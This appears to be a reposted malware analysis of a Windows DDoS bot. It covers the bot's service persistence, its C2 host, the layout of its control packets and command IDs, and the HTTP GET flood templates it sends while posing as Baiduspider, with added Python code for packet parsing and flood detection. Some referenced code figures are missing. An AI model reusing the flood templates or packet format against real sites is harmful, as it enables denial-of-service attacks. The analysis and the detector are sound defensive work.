A DDoS sample under Windows

Source: Internet
Author: User
Tags: tmp file

Analysis of a DDoS bot sample running on Windows.

Loader

After the program runs it drops a file named 256_res.tmp into the TEMP directory.

The file is then moved to the System32 directory and renamed Rasmedia.dll.

The original file is deleted.

The loader then loads the DLL it has just dropped and calls the install function that the DLL exports.

Rasmedia.dll

The exported function install registers the DLL as a service named WINHELP32, so the persistence artefacts to look for on an infected host are that service entry and System32\Rasmedia.dll.

Specifically, the registration code is as follows:

Once the service is running, two threads are created.

One thread copies its own image into memory and, whenever it finds that the image file on disk has been deleted, writes it back out again.

This loop implements the sample's self-protection against deletion.

The other thread handles communication with the remote server; the main part of that exchange is in the function startaddress.

The function first decrypts the remote server address fabao.309420.com:7002, which at the time of analysis resolved to 61.147.107.79, an IP address in Yangzhou, Jiangsu province.

It then collects information about the current system, encrypts it and sends it to the remote server.

The encryption algorithm, as recovered from the code, is as follows:

The packet sent is 96 bytes in total, as follows:

The bot then receives a control packet from the remote server.

The control packet has the following structure:

command: the remote-control command.

Accack: the packet length, which is also used to decide whether to launch the attack.

Target_url: the URL of the attack target.

Port: the destination port to attack.

Attack_message: a custom attack data payload.

The command set includes remote command execution, file download and so on, but the main functionality is clearly DDoS.

0x41000001, 0x32000004, 0x32000001 and 0x31000005 together form a compound instruction: a bot that receives it launches several types of DDoS attack against the target at once. Each of the remaining DDoS instructions corresponds to a single attack type.

The returned packet is received here. It is 228 bytes in total and still encrypted at this point.

Decrypting it with the following function shows that the decrypted data begins with 32000020, a DDoS command.

Continuing the decryption, the Target_url field yields the attack target, http://code.moquta.com.

The attack logic offers several attack patterns. 32000020 is an example of a DDoS attack using HTTP GET requests; the request template is already written into the code, and the bot only fills in the Target, Host and Referer:

This mode takes its destination port from the Port field at offset 208 of the packet buffer (v1 + 208), which defaults to 80.

Our returned packet is shown here starting at offset 0x50 (the extra zeros are an artefact of the decryption script).

The attack packet is sent here.
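To make the packet layout concrete, here is a parser for the decrypted control packet. It is an added example for this write-up, not code from the sample or from the original author. It uses the offsets the analysis gives (a 228-byte packet, the command first, Port at offset 208, Attack_message at bytes 212 to 228); the remaining layout (Accack at offset 4, Target_url as a NUL-terminated string in the 200 bytes from 8 to 208), little-endian integers and treating a zero Port as the default 80 are assumptions. The packet bytes are constructed here, not captured traffic.

```python
import struct
from dataclasses import dataclass

PACKET_LEN = 228                    # size of the control packet given in the write-up
CMD_OFFSET = 0                      # assumption: command is the first DWORD
ACCACK_OFFSET = 4                   # assumption: Accack (packet length) follows it
URL_SLICE = slice(8, 208)           # assumption: Target_url fills the gap up to Port
PORT_OFFSET = 208                   # from the write-up: v1 + 208, defaults to 80
ATTACK_MSG_SLICE = slice(212, 228)  # from mode 0x37000001: command_package[212,228]
DEFAULT_PORT = 80

# Attack modes named in the write-up (descriptions paraphrase its per-mode notes).
ATTACK_MODES = {
    0x31000001: "sockrandipsend: 40 bytes of random data, one round",
    0x31000002: "sockheapsendto: 4096-byte encrypted packets, 65534 per round",
    0x31000003: "sockrandthousandtimesendto: 2048 bytes of random letters",
    0x31000005: "sockrandsend: 1024 random bytes, runs forever",
    0x32000001: "HTTP GET flood without Referer",
    0x32000002: "HTTP GET flood with Referer (variant two)",
    0x32000004: "HTTP GET %s?=%d flood without Referer",
    0x32000020: "HTTP GET flood from the Target/Host/Referer template",
    0x33000001: "sockrandwithcountsend: '#%d<<<<<i@c<<<<<%s!' counter payload",
    0x36000001: "HTTP GET flood with Referer (variant one)",
    0x37000001: "sockendcontainsend: 16-byte Attack_message payload, runs forever",
    0x41000001: "sockrandtentimesendto: 30 bytes of random letters",
}
# The write-up says these four IDs form a compound instruction that fans out
# into several attack types at once.
COMPOUND_COMMANDS = {0x41000001, 0x32000004, 0x32000001, 0x31000005}


@dataclass
class ControlPacket:
    command: int
    accack: int
    target_url: str
    port: int
    attack_message: bytes

    @property
    def mode(self) -> str:
        return ATTACK_MODES.get(self.command, "not a DDoS command")

    @property
    def compound(self) -> bool:
        return self.command in COMPOUND_COMMANDS


def parse_control_packet(buf: bytes) -> ControlPacket:
    """Decode one already-decrypted 228-byte control packet."""
    if len(buf) != PACKET_LEN:
        raise ValueError(f"expected {PACKET_LEN} bytes, got {len(buf)}")
    (command,) = struct.unpack_from("<I", buf, CMD_OFFSET)
    (accack,) = struct.unpack_from("<I", buf, ACCACK_OFFSET)
    # Target_url: NUL-terminated ASCII inside its fixed-size field
    target_url = bytes(buf[URL_SLICE]).split(b"\x00", 1)[0].decode("ascii", "replace")
    (port,) = struct.unpack_from("<I", buf, PORT_OFFSET)
    return ControlPacket(
        command=command,
        accack=accack,
        target_url=target_url,
        port=port if port else DEFAULT_PORT,  # assumption: 0 means "use the default 80"
        attack_message=bytes(buf[ATTACK_MSG_SLICE]),
    )


def should_attack(pkt: ControlPacket, wire_len: int) -> bool:
    """Accack must match the packet length and the command must be a known DDoS mode."""
    return pkt.accack == wire_len and pkt.command in ATTACK_MODES


def build_control_packet(command: int, target_url: str, port: int = 0,
                         attack_message: bytes = b"") -> bytes:
    """Construct a test packet in the assumed layout (constructed input, not a captured sample)."""
    buf = bytearray(PACKET_LEN)
    struct.pack_into("<I", buf, CMD_OFFSET, command)
    struct.pack_into("<I", buf, ACCACK_OFFSET, PACKET_LEN)
    url = target_url.encode("ascii")[:URL_SLICE.stop - URL_SLICE.start - 1]
    buf[URL_SLICE.start:URL_SLICE.start + len(url)] = url
    struct.pack_into("<I", buf, PORT_OFFSET, port)
    msg = attack_message[:ATTACK_MSG_SLICE.stop - ATTACK_MSG_SLICE.start]
    buf[ATTACK_MSG_SLICE.start:ATTACK_MSG_SLICE.start + len(msg)] = msg
    return bytes(buf)


if __name__ == "__main__":
    # Constructed packet mirroring the decrypted one above: 32000020 -> http://code.moquta.com
    raw = build_control_packet(0x32000020, "http://code.moquta.com")
    pkt = parse_control_packet(raw)
    print(hex(pkt.command), pkt.mode, pkt.target_url, pkt.port, should_attack(pkt, len(raw)))
```

The length check in should_attack mirrors the page's note that Accack doubles as the attack gate: a packet whose Accack does not equal its own length is rejected before any mode is dispatched.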

Attack packets of the individual modes

In the following, Rand is a random number generator.

0x31000001
Fun_createthread_sockrandipsend
send_package{
    generated 5 bytes at a time, 8 times
}
Length: 40
One round

0x31000002
Fun_createthread_sockheapsendto
package{
    +2  count (starts at 0)
    +6  0
    +8  TickCount
} encrypted by sub_10005480
Length: 4096
One round = 65534 packets

0x41000001
Fun_createthread_sockrandtentimesendto
send_package{
    BUF (generated by Rand(97,122))
}
Length: 30
One round
Count % Sleep

0x31000005
Fun_createthread_sockrandsend
send_package{
    BUF ((byte) generated by Rand(0,255) << 16)
}
Length: 1024
One round, runs forever

Fun_createthread_sockconnect1
send_package{
    connect
}
One round, one packet
Then sleep

Fun_createthread_sockconnect2
send_package{
    connect
}
One round: one packet, connect and close

0x37000001
Fun_createthread_sockendcontainsend
send_package{
    BUF (command_package[212,228])
}
Length: 16
One round, runs forever

0x33000001
Fun_creathethread_sockrandwithcountsend
send_package{
    BUF ("#%d<<<<<i@c<<<<<%s!" formatted with count and a string generated by Rand(65,122))
}
Length: Rand(20,120)
One round = 6500 packets

0x31000003
Fun_callback_sockrandthousandtimesendto
send_package{
    BUF ((int) (generated by Rand(97,122) << 16) * 512 * 4)
}
Length: 2048
One round

0x32000004
Fun_createthread_socksend_withoutref_httpone
send_package{
    port 80:
    "GET %s?=%d HTTP/1.1"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Host: %s"
    "Cache-Control: no-cache"
    other ports:
    "GET %s?=%d HTTP/1.1"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Host: %s:%d"
    "Cache-Control: no-cache"
}
Length: buf
One round, runs forever

0x32000001
Fun_createthread_socksend_withoutref_httptwo
send_package{
    port 80:
    "GET / HTTP/1.1"
    "Host: %s"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-cache"
    "Connection: close"
    other ports:
    "GET / HTTP/1.1"
    "Host: %s:%d"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-cache"
    "Connection: close"
} (no Referer)
Length: buf
One round, runs forever

0x32000001
Fun_createthread_socksend_onlyhost_http
send_package{
    port 80:
    "GET / HTTP/1.1"
    "Host: %s"
    other ports:
    "GET / HTTP/1.1"
    "Host: %s:%d"
}
Length: buf
One round, runs forever

0x36000001
Fun_createthread_socksend_withref_httpone
send_package{
    port 80:
    "GET %s HTTP/1.1"
    "Host: %s"
    "User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-store, Must-revalidate"
    "Referer: http://%s"
    "Connection: close"
    other ports:
    "GET %s HTTP/1.1"
    "Host: %s:%d"
    "User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-store, Must-revalidate"
    "Referer: http://%s"
    "Connection: close"
}
Length: buf
One round, runs forever

0x32000002
Fun_createthread_socksend_withref_httptwo
send_package{
    port 80:
    "GET %s HTTP/1.1"
    "Host: %s"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-store, Must-revalidate"
    "Referer: http://%s"
    "Connection: close"
    other ports:
    "GET %s HTTP/1.1"
    "Host: %s:%d"
    "User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
    "Cache-Control: no-store, Must-revalidate"
    "Referer: http://%s"
    "Connection: close"
}
Length: buf
One round, runs forever
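Every HTTP mode above impersonates Baiduspider, and the templates carry fixed quirks that a real crawler does not: a query string whose only parameter has an empty name (GET %s?=%d), a User-Agent with '+' where the real Baiduspider UA has spaces, must-revalidate in a request Cache-Control (it is a response-only directive), and a bare GET / carrying nothing but Host. The detector below checks raw request heads for those quirks. It is an added example, not code from the sample or its author; the request samples are constructed from the templates rather than captured, and the header casing is assumed (the comparisons are case-insensitive).

```python
import re
from typing import Dict, List, Tuple


def parse_request(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP request head into the request line and a dict keyed by lower-cased header name."""
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def flood_indicators(raw: str) -> List[str]:
    """Return the template quirks found in one request head; an empty list means nothing matched."""
    request_line, headers = parse_request(raw)
    ua = headers.get("user-agent", "")
    cache_control = headers.get("cache-control", "").lower()
    hits: List[str] = []
    # 0x32000004: "GET %s?=%d HTTP/1.1" -> one query parameter with an empty name and a numeric value
    if re.search(r"\?=\d+\s+HTTP/1\.[01]$", request_line):
        hits.append("empty-name numeric query (?=%d)")
    # 0x36000001: '+' replaces the spaces in the UA; the genuine UA only has '+' before "http://"
    if "baiduspider" in ua.lower() and "+" in ua.split("+http", 1)[0]:
        hits.append("plus-joined Baiduspider UA")
    # Referer-carrying templates: must-revalidate is a response directive and does not belong in a request
    if "must-revalidate" in cache_control:
        hits.append("must-revalidate in request Cache-Control")
    # onlyhost template: "GET / HTTP/1.1" with nothing but a Host header
    if request_line.startswith("GET / ") and set(headers) == {"host"}:
        hits.append("bare GET / with Host only")
    return hits


def scan(requests: Dict[str, str]) -> Dict[str, List[str]]:
    """Run the detector over a batch of named request heads and keep only the ones that matched."""
    results: Dict[str, List[str]] = {}
    for name, raw in requests.items():
        hits = flood_indicators(raw)
        if hits:
            results[name] = hits
    return results


BAIDU_UA = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"

# Constructed request heads built from the templates in the write-up (not captured traffic).
SAMPLE_REQUESTS = {
    "mode_0x32000004": (
        "GET /index.php?=48213 HTTP/1.1\r\n"
        f"User-Agent: {BAIDU_UA}\r\n"
        "Host: code.moquta.com\r\n"
        "Cache-Control: no-cache\r\n\r\n"
    ),
    "mode_0x36000001": (
        "GET /index.php HTTP/1.1\r\n"
        "Host: code.moquta.com\r\n"
        "User-Agent: Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)\r\n"
        "Cache-Control: no-store, Must-revalidate\r\n"
        "Referer: http://code.moquta.com\r\n"
        "Connection: close\r\n\r\n"
    ),
    "mode_onlyhost": "GET / HTTP/1.1\r\nHost: code.moquta.com\r\n\r\n",
    "real_crawler": (
        "GET /robots.txt HTTP/1.1\r\n"
        "Host: code.moquta.com\r\n"
        f"User-Agent: {BAIDU_UA}\r\n"
        "Accept: */*\r\n"
        "Connection: close\r\n\r\n"
    ),
    "benign": (
        "GET /index.php?id=7 HTTP/1.1\r\n"
        "Host: code.moquta.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0\r\n"
        "Accept: text/html\r\n"
        "Connection: keep-alive\r\n\r\n"
    ),
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_REQUESTS).items():
        print(f"{name}: {', '.join(hits)}")
```

A genuine Baidu crawler is best confirmed by a reverse-DNS lookup of the source address; that network check is deliberately left out so the block runs offline, which is why the real_crawler sample produces no hits on its UA alone.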
